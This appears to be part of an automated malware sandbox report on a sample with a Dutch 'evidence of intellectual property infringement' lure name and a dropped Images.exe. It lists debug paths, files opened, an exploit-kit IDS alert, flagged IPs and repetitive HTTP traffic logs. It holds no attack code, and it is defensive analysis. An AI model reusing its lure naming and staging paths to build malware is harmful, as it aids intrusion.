Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 00000050.00000002.14842796907.000000006C03C000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\a\1\b\bin\win32\python310.pdb source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: .pdbhqrY source: Images.exe, 0000003D.00000003.14469255497.000001CC08C6F000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14467163576.000001CC08C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.exe, 0000003D.00000000.14242559496.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp, Images.exe, 0000003D.00000002.14479333368.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.exe, 0000003D.00000000.14242559496.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp, Images.exe, 0000003D.00000002.14479333368.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: libmupdf.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: w.pdbit source: Images.exe, 0000003D.00000003.14469255497.000001CC08C6F000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14467163576.000001CC08C46000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Numbers.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_IntegerBase.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Primality.py
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Primality.pyi
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_IntegerBase.pyi
Source: C:\Users\user\Desktop\Images.exe	File opened: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\Numbers.pyi

Networking

Detected suspicious crossdomain redirect

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

HTTP traffic: Redirect from: ims-na1.adobelogin.com to https://auth.services.adobe.com/en_us/index.html?delegated_auth_party=requester&callback=https%3a%2f%2fims-na1.adobelogin.com%2fims%2fadobeid%2fngl_acrobat_reader1%2fadobeid%2fdevice%3fredirect_uri%3dhttps%253a%252f%252foobe.adobe.com%252f%26hashed_device_id%3dlltapl-75kpmse-yahsrv5m7ieztdxhjzalp2yrhpt4%26device_name%3d226533%26code_challenge_method%3dplain%26use_ms_for_expiry%3dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2copenid%2cadobeid&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_us&flow_type=device&dctx_id=v%3a2%2cs%2c811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2cfacebook%2capple%2cmicrosoft%2cline%2ckakao&response_type=device&device_name=226533&hashed_device_id=lltapl-75kpmse-yahsrv5m7ieztdxhjzalp2yrhpt4&code_challenge_method=plain&redirect_uri=https%3a%2f%2foobe.adobe.com%2f&use_ms_for_expiry=false

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.204.152.149 23.204.152.149
Source: Joe Sandbox View	IP Address: 172.66.0.163 172.66.0.163
Source: Joe Sandbox View	IP Address: 23.204.152.140 23.204.152.140

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.24:64818 -> 172.66.0.163:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ims/authorize/v3?client_id=ngl_acrobat_reader1&response_type=device&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&device_name=226533&redirect_uri=https://oobe.adobe.com/&scope=additional_info.account_type%2Copenid%2CAdobeID&locale=en_US&dctx_id=v:2,s,811d9b10-f7f6-11ed-9fbc-3100c13f41be HTTP/1.1Host: ims-na1.adobelogin.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1737546001421 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Content-Type: application/x-www-form-urlencodedAccept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ecr2zvs.js HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1737546001421 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Content-Type: application/x-www-form-urlencodedAccept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: demdex=66209848827355628032381290282223984662Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /consent/7a5eb705-95ed-4cc4-a11d-0cc5760e93db/7a5eb705-95ed-4cc4-a11d-0cc5760e93db.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /af/40207f/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /p.gif?s=1&k=ecr2zvs&ht=tk&h=auth.services.adobe.com&f=7180.7182.7184&a=1164490&js=1.21.0&app=typekit&e=js&_=1737546003975 HTTP/1.1Host: p.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.0.163
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 18.232.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.86.42
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.86.42
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.86.42
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.152.140

Source: global traffic	HTTP traffic detected: GET /ims/authorize/v3?client_id=ngl_acrobat_reader1&response_type=device&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&device_name=226533&redirect_uri=https://oobe.adobe.com/&scope=additional_info.account_type%2Copenid%2CAdobeID&locale=en_US&dctx_id=v:2,s,811d9b10-f7f6-11ed-9fbc-3100c13f41be HTTP/1.1Host: ims-na1.adobelogin.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1737546001421 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Content-Type: application/x-www-form-urlencodedAccept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ecr2zvs.js HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1737546001421 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Content-Type: application/x-www-form-urlencodedAccept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: demdex=66209848827355628032381290282223984662Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /consent/7a5eb705-95ed-4cc4-a11d-0cc5760e93db/7a5eb705-95ed-4cc4-a11d-0cc5760e93db.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://auth.services.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
